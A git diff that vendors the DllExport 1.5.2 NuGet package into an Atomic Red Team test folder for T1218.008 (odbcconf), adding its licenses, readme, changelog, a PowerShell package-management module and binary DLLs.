--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages.config
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/3rd-party.txt b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/3rd-party.txt
new file mode 100644
index 00000000..6b51b501
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/3rd-party.txt
@@ -0,0 +1,16 @@
+DllExport [ github.com/3F/DllExport ]
+- - - - - - - - - - - - - - - - - - -
+
+# Third-party software components
+
+## The DllExport includes:
+
+ * CoreCLR / ILAsm / ILDasm [ github.com/3F/coreclr ]
+ * Mono.Cecil [ github.com/jbevain/cecil ]
+ * SDK reference assemblies for PowerShell version 5 [ github.com/PowerShell/ ]
+
+## Maintenance of this project also includes:
+
+ * vsSolutionBuildEvent /+ CI.MSBuild [ github.com/3F/vsSolutionBuildEvent ]
+ * GetNuTool [ github.com/3F/GetNuTool ]
+
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/DllExport.1.5.2.nupkg b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/DllExport.1.5.2.nupkg
new file mode 100644
index 00000000..3d083fdd
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/DllExport.1.5.2.nupkg differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/License.txt b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/License.txt
new file mode 100644
index 00000000..443e13aa
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/License.txt
@@ -0,0 +1,22 @@
+The MIT License (MIT)
+
+Copyright (c) 2009-2015 Robert Giesecke
+Copyright (c) 2016-2017 Denis Kuzmin
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/Readme.md b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/Readme.md
new file mode 100644
index 00000000..7ad3c028
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/Readme.md
@@ -0,0 +1,188 @@
+# [DllExport](https://github.com/3F/DllExport)
+
+*Unmanaged Exports ( .NET DllExport )*
+
+```
+Copyright (c) 2009-2015 Robert Giesecke
+Copyright (c) 2016-2017 Denis Kuzmin
+```
+
+[](https://ci.appveyor.com/project/3Fs/dllexport/branch/master)
+[](https://www.nuget.org/packages/DllExport/)
+[](https://github.com/3F/DllExport/blob/master/LICENSE)
+
+
+```csharp
+[DllExport("Init", CallingConvention.Cdecl)]
+public static int entrypoint(IntPtr L)
+{
+ // ... it will be called from Lua script
+
+ lua_pushcclosure(L, onProc, 0);
+ lua_setglobal(L, "onKeyDown");
+
+ return 0;
+}
+```
+
+* **For work with Unmanaged code/libraries (binding between .NET and C/C++ etc.), see [Conari](https://github.com/3F/Conari)**
+* If you need convenient work with Lua (5.1, 5.2, 5.3, ...), see [LunaRoad](https://github.com/3F/LunaRoad)
+
+```csharp
+[DllExport("Init", CallingConvention.Cdecl)]
+// __cdecl is the default calling convention for our library as and for C and C++ programs
+[DllExport(CallingConvention.StdCall)]
+[DllExport("MyFunc")]
+[DllExport]
+```
+
+Support of Modules: Library (**.dll**) and Executable (**.exe**) [[?](https://github.com/3F/DllExport/issues/18)]
+
+
+Where to look ? v1.2+ provides dynamic definitions of namespaces (ddNS feature), thus you can use what you want - details **[here](https://github.com/3F/DllExport/issues/2)**
+
+```cpp
+ Via Cecil or direct modification:
+
+ Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
+
+ 000005B0 00 C4 7B 01 00 00 00 2F 00 12 05 .Ä{..../...
+ 000005C0 00 00 02 00 00 00 00 00 00 00 00 00 00 00 26 00 ..............&.
+ 000005D0 20 02 00 00 00 00 00 00 00 49 2E 77 61 6E 74 2E ........I.want. <<<-
+ 000005E0 74 6F 2E 66 6C 79 00 00 00 00 00 00 00 00 00 00 to.fly.......... <<<-
+```
+
+[](#)
+[](https://github.com/3F/DllExport/issues/11#issuecomment-250907940)
+
+----
+
+
+[Initially](https://github.com/3F/DllExport/issues/3) the original tool `UnmanagedExports` was distributed by Robert Giesecke as an closed-source tool **under the [MIT License](https://opensource.org/licenses/mit-license.php)**:
+
+* [Official page](https://sites.google.com/site/robertgiesecke/Home/uploads/unmanagedexports) - *posted Jul 9, 2009 [ updated Dec 19, 2012 ]*
+* [Official NuGet Packages](https://www.nuget.org/packages/UnmanagedExports)
+
+Now, we will be more open ! all details [here](https://github.com/3F/DllExport/issues/3)
+
+## License
+
+It still under the [MIT License (MIT)](https://github.com/3F/DllExport/blob/master/LICENSE) - be a ~free~ and open
+
+## &
+
+### How it works
+
+Current features has been implemented through [ILDasm](https://github.com/3F/coreclr/tree/master/src/ildasm) & [ILAsm](https://github.com/3F/coreclr/tree/master/src/ilasm) that does the all required steps via `.export` directive.
+
+**What inside ? or how works the .export directive ?**
+
+Read about format PE32/PE32+, start with grammar from asmparse and move to writer:
+
+```cpp
+...
+if(PASM->m_pCurMethod->m_dwExportOrdinal == 0xFFFFFFFF)
+{
+ PASM->m_pCurMethod->m_dwExportOrdinal = $3;
+ PASM->m_pCurMethod->m_szExportAlias = $6;
+ if(PASM->m_pCurMethod->m_wVTEntry == 0) PASM->m_pCurMethod->m_wVTEntry = 1;
+ if(PASM->m_pCurMethod->m_wVTSlot == 0) PASM->m_pCurMethod->m_wVTSlot = $3 + 0x8000;
+}
+...
+EATEntry* pEATE = new EATEntry;
+pEATE->dwOrdinal = pMD->m_dwExportOrdinal;
+pEATE->szAlias = pMD->m_szExportAlias ? pMD->m_szExportAlias : pMD->m_szName;
+pEATE->dwStubRVA = EmitExportStub(pGlobalLabel->m_GlobalOffset+dwDelta);
+m_EATList.PUSH(pEATE);
+...
+// logic of definition of records into EXPORT_DIRECTORY (see details from PE format)
+HRESULT Assembler::CreateExportDirectory()
+{
+...
+ IMAGE_EXPORT_DIRECTORY exportDirIDD;
+ DWORD exportDirDataSize;
+ BYTE *exportDirData;
+ EATEntry *pEATE;
+ unsigned i, L, ordBase = 0xFFFFFFFF, Ldllname;
+ ...
+ ~ now we're ready to miracles ~
+```
+
+or read my short explanations from here: [DllMain & the export-table](https://github.com/3F/DllExport/issues/5#issuecomment-240697109); [DllExport.dll](https://github.com/3F/DllExport/issues/28#issuecomment-281957212); [.exp & .lib](https://github.com/3F/DllExport/issues/9#issuecomment-246189220); [ordinals](https://github.com/3F/DllExport/issues/8#issuecomment-245228065) ...
+
+### How to get DllExport
+
+Available variants:
+
+* NuGet PM: `Install-Package DllExport`
+* [GetNuTool](https://github.com/3F/GetNuTool): `msbuild gnt.core /p:ngpackages="DllExport"` or [gnt](https://github.com/3F/GetNuTool/releases/download/v1.5/gnt.bat) /p:ngpackages="DllExport"
+* NuGet Commandline: `nuget install DllExport`
+* [/releases](https://github.com/3F/DllExport/releases) ( [latest](https://github.com/3F/DllExport/releases/latest) )
+* [Nightly builds](https://ci.appveyor.com/project/3Fs/dllexport/history) (`/artifacts` page). But remember: It can be unstable or not work at all. Use this for tests of latest changes.
+
+### How to Build
+
+No requires additional steps for you, just build as you need.
+
+Use build.bat if you need final NuGet package as a `DllExport..nupkg` etc.
+* *You do not need to do anything inside IDE if you have installed [this plugin](https://visualstudiogallery.msdn.microsoft.com/0d1dbfd7-ed8a-40af-ae39-281bfeca2334/).*
+
+
+### How to Debug
+
+For example, find the DllExport.MSBuild project in solution:
+
+* `Properties` > `Debug`:
+ * `Start Action`: set as `Start External program`
+ * Add full path to **msbuild.exe**, for example: C:\Program Files (x86)\MSBuild\14.0\Bin\MSBuild.exe
+ * `Start Options` > `Command line arguments` write for example:
+
+```bash
+".sln" /t:Build /p:Configuration=
+```
+
+use additional `Diagnostic` key to msbuild if you need details from .targets
+```bash
+".sln" /verbosity:Diagnostic /t:Rebuild /p:Configuration=
+```
+
+Go to `Start Debugging`. Now you can debug at runtime.
+
+### coreclr - ILAsm / ILDasm
+
+We use **our custom versions of coreclr**, special for DllExport project - https://github.com/3F/coreclr
+
+This helps to avoid some problems ([like this](https://github.com/3F/DllExport/issues/17)) and more...
+
+*To build minimal version (means that it does not include all components as for original coreclr repo):*
+
+* Restore git submodule or use repo: https://github.com/3F/coreclr.git
+
+```bash
+git submodule update --init --recursive
+```
+
+*Make sure that you have installed [CMake](https://cmake.org/download/), then build simply:*
+
+```bash
+build_s all x86 x64 Release
+build_s x86 Release
+```
+
+or use
+```bash
+build_coreclr_x86.cmd
+build_coreclr_x86_x64.cmd
+```
+
+*You can also use our binaries of coreclr separately if needed:*
+
+* [](https://www.nuget.org/packages/ILAsm/)
+* Look also [here](https://github.com/3F/coreclr/issues/1)
+
+-------------
+
+**Support ?**
+
+[just a note again...](https://plus.google.com/101239554716569212042/posts/6yP64gDyum1)
+*I mentioned earlier that DllExport is not priority for me (current impl.) "- I will do something from current tasks, but guys, please support it with me" and... why so many support from me o_o*
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/changelog.txt b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/changelog.txt
new file mode 100644
index 00000000..785af0e7
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/changelog.txt
@@ -0,0 +1,80 @@
+DllExport - github.com/3F/DllExport
+- - - - - - - - - - - - - - - - - -
+
+[v1.5.2] 2017.03.13
+
+ * FIXED: Failing to compile in VS2017. Issue #29
+ `Error The "DllExportAppDomainIsolatedTask" task failed unexpectedly. System.ArgumentException: Requested value 'Version46' was not found.`
+
+ * FIXED: Possible error `Could not load file or assembly Microsoft.Build.Utilities or one of its dependencies.`
+ * CHANGED: Updated script for loading of the Configurator to avoid problem with old assemblies. Issue #22
+
+[v1.5.1] 2016.11.12
+
+ * FIXED: Error : Invalid Option: /CVRES= Issue #20
+ * NOTE: Our coreclr version was compiled with MSVC 14.0. Related Issue #21
+
+[v1.5] 2016.11.04
+
+ * FIXED: Fixed problem with white-space chars in path: `Cannot find path '' because it does not exist ...`
+ * FIXED: Fixed typo with fullseq (ddNS) - incorrect `0x30 0x30` ~0x007A7-0x007A8 /details in #14
+ * FIXED: Possible problem with NullReferenceException when removing package.
+ * FIXED: Fixed problem with old NS data when we try to install package for project A, then for project B
+ * NEW: Implemented 'Generate .exp + .lib via MS Library Manager' #9
+ GUI Configurator + MSBuild property: `DllExportGenExpLib`
+
+ * NEW: Added support of unmanaged-export for Executable Modules (.exe) #18
+ * NEW: Cecil variant for ddNS features /#14, #2
+ * NEW: Added our custom IL Assembler as option to fix incorrect 0x13 / 0x11 opcodes. #17
+ GUI Configurator + MSBuild property: `DllExportOurILAsm`
+ It should help for users of Fody projects, etc.
+ https://github.com/Fody/Fody/issues/271
+
+ IlAsm 4.5.1 https://github.com/3F/coreclr
+ based on 4.5.22220.0 / coreclr 1.0.4
+ changelog of our coreclr for this release: https://github.com/3F/coreclr/blob/master/changelog.txt
+
+ * CHANGED: Updated scripts of installing/removing package for more correct loading of our assemblies.
+
+[v1.4] 2016.10.05
+
+ * FIXED: Fixed bug - `An item with the same key has already been added`. Issue #10
+ * FIXED: Bug with Meta library: Incorrect default values. Issue #16
+ please note, the __cdecl is the default calling convention for our library
+ as and for C and C++ programs.
+
+ * FIXED?: Probably fixed bug - `Script errors on package install` Issue #6
+ * FIXED?: Probably fixed bug - `non-English system language - syntax error` Issue #7
+ * NEW: GUI Configurator with updated ddNS features.
+ * NEW: Implemented feature 'Export for platform': [ x86 / x64 / x86 + x64 ] Issue #9
+ * NEW: Implemented feature 'Base for ordinals'. Issue #11
+ There is also alternative to configure this number - MSBuild property: DllExportOrdinalsBase
+
+ * NEW: The one (1) now is used by default as Base for all ordinals.
+ `Mimic ordinal counter (start from 1 instead of 0)` Issue #8
+
+ * CHANGED: The ddNS features now as binary cmdlet `NSBin`. Use `nsbin.bat` if needed.
+ * CHANGED: `Set "Inherited = false" in AttributeUsage for DllExportAttribute`. Issue #15
+ * OTHER: other possible changes and fixes.
+
+[v1.3] 2016.08.21
+
+ * FIXED: bug 'Incorrect library' when DllExport installed for 2+ projects.
+ * CHANGED: DllExport now uses `Cdecl` calling convention by default.
+ * CHANGED: Mono.Cecil v0.9.6.4
+
+[v1.2] 2016.07.13
+
+ * CHANGED: dynamic definition of namespace for user scope. Issue #2
+
+[v1.1] 2016.06.29
+
+ * CHANGED: DllExport now is part of System.Runtime.InteropServices as and DllImport.
+ * CHANGED: Mono.Cecil v0.9.6.1
+ * NEW: 0x80070005 meaning... Issue #1
+ * NEW: +DllExport(CallingConvention convention) signature
+
+[v1.0] 2016.06.25
+
+ * Initial the open release, based on v1.2.7.38850
+
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll
new file mode 100644
index 00000000..4c13ce7a
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll.ddNSi b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll.ddNSi
new file mode 100644
index 00000000..57c695c5
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll.ddNSi differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll.raw b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll.raw
new file mode 100644
index 00000000..9d673d4f
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/lib/net20/DllExport.dll.raw differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/DllExportCmdLets.psm1 b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/DllExportCmdLets.psm1
new file mode 100644
index 00000000..cf24d4e8
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/DllExportCmdLets.psm1
@@ -0,0 +1,141 @@
+function Remove-OldDllExportFolder {
+ param($project)
+ $defaultFiles = ('DllExportAttribute.cs',
+ 'Mono.Cecil.dll',
+ 'RGiesecke.DllExport.dll',
+ 'RGiesecke.DllExport.pdb',
+ 'RGiesecke.DllExport.MSBuild.dll',
+ 'RGiesecke.DllExport.MSBuild.pdb',
+ 'net.r_eg.DllExport.targets')
+
+ $projectFile = New-Object 'System.IO.FileInfo'($project.FullName)
+
+ $projectFile.Directory.GetDirectories("DllExport") | Select-Object -First 1 | % {
+ $dllExportDir = $_
+
+ if($dllExportDir.GetDirectories().Count -eq 0){
+ $unknownFiles = $dllExportDir.GetFiles() | Select -ExpandProperty Name | ? { -not $defaultFiles -contains $_ }
+
+ if(-not $unknownFiles){
+ Write-Host "Removing 'DllExport' from " $project.Name
+ $project.ProjectItems | ? { $_.Name -ieq 'DllExport' } | % {
+ $_.Remove()
+ }
+
+ Write-Host "Deleting " $dllExportDir.FullName " ..."
+ $dllExportDir.Delete($true)
+ }
+ }
+ }
+}
+
+function Remove-OldDllExportFolders {
+ Get-Project -all | % {
+ Remove-OldDllExportFolder $_
+ }
+}
+
+function Get-MBEGlobalProjectCollection {
+ $msBuildV4Name = 'Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a';
+ $msBuildV4 = [System.Reflection.Assembly]::LoadWithPartialName($msBuildV4Name)
+
+ if(!$msBuildV4) {
+ throw New-Object 'System.IO.FileNotFoundException'("Could not load $msBuildV4Name.")
+ }
+
+ $projectCollection = $msBuildV4.GetType('Microsoft.Build.Evaluation.ProjectCollection')
+
+ return $projectCollection::GlobalProjectCollection
+}
+
+function Get-DllExportMsBuildProjectsByFullName([String] $fullName) {
+ $gpc = Get-MBEGlobalProjectCollection
+
+ return $gpc.GetLoadedProjects($fullName)
+}
+
+function Get-TempPathToDllTools([String] $toolsPath) {
+
+ $tempRoot = (Join-Path $([System.IO.Path]::GetTempPath()) '50ACAD2A-5AB3-4E6A-BA66-07F55672E91F') -replace ' ', '` '
+ $tempFolder = $([System.Guid]::NewGuid());
+ $delprefix = '__del__';
+
+ # rename for checking of lock / loaded assemblies
+ Get-ChildItem -Recurse -Path $tempRoot | ?{ $_.PSIsContainer } | %{
+ Rename-Item -ErrorAction SilentlyContinue -Path $_.FullName -NewName "$delprefix$($_.Name)"
+ }
+
+ # now try to delete only this
+ Get-ChildItem -Recurse -Path $tempRoot | ?{ $_.PSIsContainer -and $_.Name.StartsWith($delprefix) } | %{
+ Remove-Item $_.FullName -Force -Recurse -ErrorAction SilentlyContinue
+ }
+
+ $tdll = (Join-Path $tempRoot $tempFolder);
+ if(!(Test-Path -path $tdll)) {
+ New-Item $tdll -Type Directory >$null
+ }
+ Copy-Item $toolsPath\*.dll -Destination $tdll >$null
+
+ return $tdll
+}
+
+function Get-TempPathToConfiguratorIfNotLoaded([String] $asmFile, [String] $toolsPath) {
+
+ $tdll = Get-TempPathToDllTools $toolsPath
+ $mdll = (Join-Path $tdll $asmFile)
+
+ if(!(Get-Module -Name $asmFile)) {
+ # Import-Module $mdll;
+ return $mdll
+ }
+ return $null
+}
+
+# solution from here: https://github.com/3F/vsSolutionBuildEvent/blob/master/vsSolutionBuildEvent/Actions/ActionCSharp.cs
+# we can use it from 'init.ps1' for loading only once, or from 'install.ps1' / 'uninstall.ps1' to use always latest assemblies
+function Load-Configurator([String] $toolsPath) {
+
+ Get-Module -All | ?{ $_.Name -like '*net.r_eg.DllExport.Configurator*' } | % { Remove-Module $_ }
+
+ $nsbin = [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes("$toolsPath\NSBin.dll"));
+ $conf = [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes("$toolsPath\net.r_eg.DllExport.Configurator.dll"));
+
+ return $conf;
+}
+
+function Get-AllDllExportMsBuildProjects {
+ (Get-Project -all | % {
+ Get-DllExportMsBuildProjectsByFullName $_.FullName
+ }) | ? {
+ return ($_.Xml.Imports | ? {
+ "net.r_eg.DllExport.targets" -ieq [System.IO.Path]::GetFileName($_.Project);
+ }).Length -gt 0;
+ }
+}
+
+function Set-NoDllExportsForAnyCpu([String] $projectName, [System.Nullable[bool]] $value) {
+ $projects = Get-AllDllExportMsBuildProjects;
+
+ [String] $asString = $value;
+
+ if($projectName) {
+ $projects = $projects | where { $_.Name -ieq $projectName };
+ }
+ $propertyName = 'NoDllExportsForAnyCpu';
+
+ $projects = $projects | where {
+ $_.GetPropertyValue($propertyName) -ine $asString
+ } | % {
+ $_.SetProperty($propertyName, $asString);
+ }
+}
+
+Export-ModuleMember Set-NoDllExportsForAnyCpu
+Export-ModuleMember Get-MBEGlobalProjectCollection
+Export-ModuleMember Get-TempPathToDllTools
+Export-ModuleMember Get-TempPathToConfiguratorIfNotLoaded
+Export-ModuleMember Load-Configurator
+Export-ModuleMember Remove-OldDllExportFolder
+Export-ModuleMember Remove-OldDllExportFolders
+Export-ModuleMember Get-DllExportMsBuildProjectsByFullName
+Export-ModuleMember Get-AllDllExportMsBuildProjects
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Build.Framework.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Build.Framework.dll
new file mode 100644
index 00000000..6c6f19be
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Build.Framework.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Build.Utilities.v4.0.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Build.Utilities.v4.0.dll
new file mode 100644
index 00000000..f797a177
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Build.Utilities.v4.0.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Management.Infrastructure.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Management.Infrastructure.dll
new file mode 100644
index 00000000..786b7593
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Microsoft.Management.Infrastructure.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Mono.Cecil.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Mono.Cecil.dll
new file mode 100644
index 00000000..5a07cf6b
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/Mono.Cecil.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/NSBin.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/NSBin.dll
new file mode 100644
index 00000000..4e9958d6
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/NSBin.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/NSBin.pdb b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/NSBin.pdb
new file mode 100644
index 00000000..09087e21
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/NSBin.pdb differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.MSBuild.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.MSBuild.dll
new file mode 100644
index 00000000..231d6ef4
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.MSBuild.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.MSBuild.pdb b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.MSBuild.pdb
new file mode 100644
index 00000000..ac21f927
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.MSBuild.pdb differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.dll
new file mode 100644
index 00000000..970e713e
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.pdb b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.pdb
new file mode 100644
index 00000000..b30ef138
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/RGiesecke.DllExport.pdb differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/System.Management.Automation.dll b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/System.Management.Automation.dll
new file mode 100644
index 00000000..41a5fe9a
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/System.Management.Automation.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/LICENSE.TXT b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/LICENSE.TXT
new file mode 100644
index 00000000..99ae10b2
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/LICENSE.TXT
@@ -0,0 +1,21 @@
+The MIT License (MIT)
+
+Copyright (c) .NET Foundation and Contributors
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/PATENTS.TXT b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/PATENTS.TXT
new file mode 100644
index 00000000..4b61bfaa
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/PATENTS.TXT
@@ -0,0 +1,47 @@
+Microsoft Patent Promise for .NET Libraries and Runtime Components
+
+Microsoft Corporation and its affiliates ("Microsoft") promise not to assert
+any .NET Patents against you for making, using, selling, offering for sale,
+importing, or distributing Covered Code, as part of either a .NET Runtime or
+as part of any application designed to run on a .NET Runtime.
+
+If you file, maintain, or voluntarily participate in any claim in a lawsuit
+alleging direct or contributory patent infringement by any Covered Code, or
+inducement of patent infringement by any Covered Code, then your rights under
+this promise will automatically terminate.
+
+This promise is not an assurance that (i) any .NET Patents are valid or
+enforceable, or (ii) Covered Code does not infringe patents or other
+intellectual property rights of any third party. No rights except those
+expressly stated in this promise are granted, waived, or received by
+Microsoft, whether by implication, exhaustion, estoppel, or otherwise.
+This is a personal promise directly from Microsoft to you, and you agree as a
+condition of benefiting from it that no Microsoft rights are received from
+suppliers, distributors, or otherwise from any other person in connection with
+this promise.
+
+Definitions:
+
+"Covered Code" means those Microsoft .NET libraries and runtime components as
+made available by Microsoft at https://github.com/dotnet/coreclr,
+https://github.com/dotnet/corefx and https://github.com/dotnet/corert.
+
+".NET Patents" are those patent claims, both currently owned by Microsoft and
+acquired in the future, that are necessarily infringed by Covered Code. .NET
+Patents do not include any patent claims that are infringed by any Enabling
+Technology, that are infringed only as a consequence of modification of
+Covered Code, or that are infringed only by the combination of Covered Code
+with third party code.
+
+".NET Runtime" means any compliant implementation in software of (a) all of
+the required parts of the mandatory provisions of Standard ECMA-335 – Common
+Language Infrastructure (CLI); and (b) if implemented, any additional
+functionality in Microsoft's .NET Framework, as described in Microsoft's API
+documentation on its MSDN website. For example, .NET Runtimes include
+Microsoft's .NET Framework and those portions of the Mono Project compliant
+with (a) and (b).
+
+"Enabling Technology" means underlying or enabling technology that may be
+used, combined, or distributed in connection with Microsoft's .NET Framework
+or other .NET Runtimes, such as hardware, operating systems, and applications
+that run on .NET Framework or other .NET Runtimes.
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/README.md b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/README.md
new file mode 100644
index 00000000..a4fc92dc
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/README.md
@@ -0,0 +1,18 @@
+[.NET Core Runtime (CoreCLR)](https://github.com/3F/coreclr)
+===========================
+
+This repo contains the .NET Core runtime, called CoreCLR, and the base library, called mscorlib. It includes the garbage collector, JIT compiler, base .NET data types and many low-level classes.
+
+Build Status
+------------
+
+ | CI
+--------------------| ----------------
+Win.x86-x64.Release | [](https://ci.appveyor.com/project/3Fs/coreclr/branch/master)
+
+
+License
+-------
+
+.NET Core (including the coreclr repo) is licensed under the [MIT license](LICENSE.TXT).
+
